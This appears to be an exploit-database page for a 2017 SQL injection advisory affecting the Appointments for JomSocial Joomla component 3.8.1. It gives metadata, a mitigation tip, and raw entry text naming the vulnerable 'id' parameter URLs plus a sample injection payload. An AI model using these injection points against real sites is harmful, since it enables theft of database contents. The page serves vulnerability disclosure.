Joomla! Component Appointments for JomSocial v3.8.1 - SQL Injection

vendor:

Joomla! Component Appointments for JomSocial

by:

Ihsan Sencan

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla! Component Appointments for JomSocial

Affected Version From: 3.8.1

Affected Version To: 3.8.1

Patch Exists: NO

Related CWE: N/A

CPE: a:cmsplugin:joomla!_component_appointments_for_jomsocial

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7 x64, Kali Linux x64

2017

Joomla! Component Appointments for JomSocial v3.8.1 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Appointments for JomSocial v3.8.1, which allows an attacker to inject malicious SQL queries via the 'id' parameter in the 'viewappointment' and 'edit' scripts. An attacker can use this vulnerability to gain access to sensitive information from the database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Appointments for JomSocial v3.8.1 - SQL Injection
# Google Dork: N/A
# Date: 25.02.2017
# Vendor Homepage: https://www.cmsplugin.com/
# Software : https://www.cmsplugin.com/products/components/1-appointments-for-jomsocial
# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-appointments/
# Version: 3.8.1 
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/my-appointments/viewappointment?id=[SQL]
# http://localhost/[PATH]/my-appointments/my-appointments/edit?id=[SQL]
# '+order+by+10-- -
# Etc...
# # # # #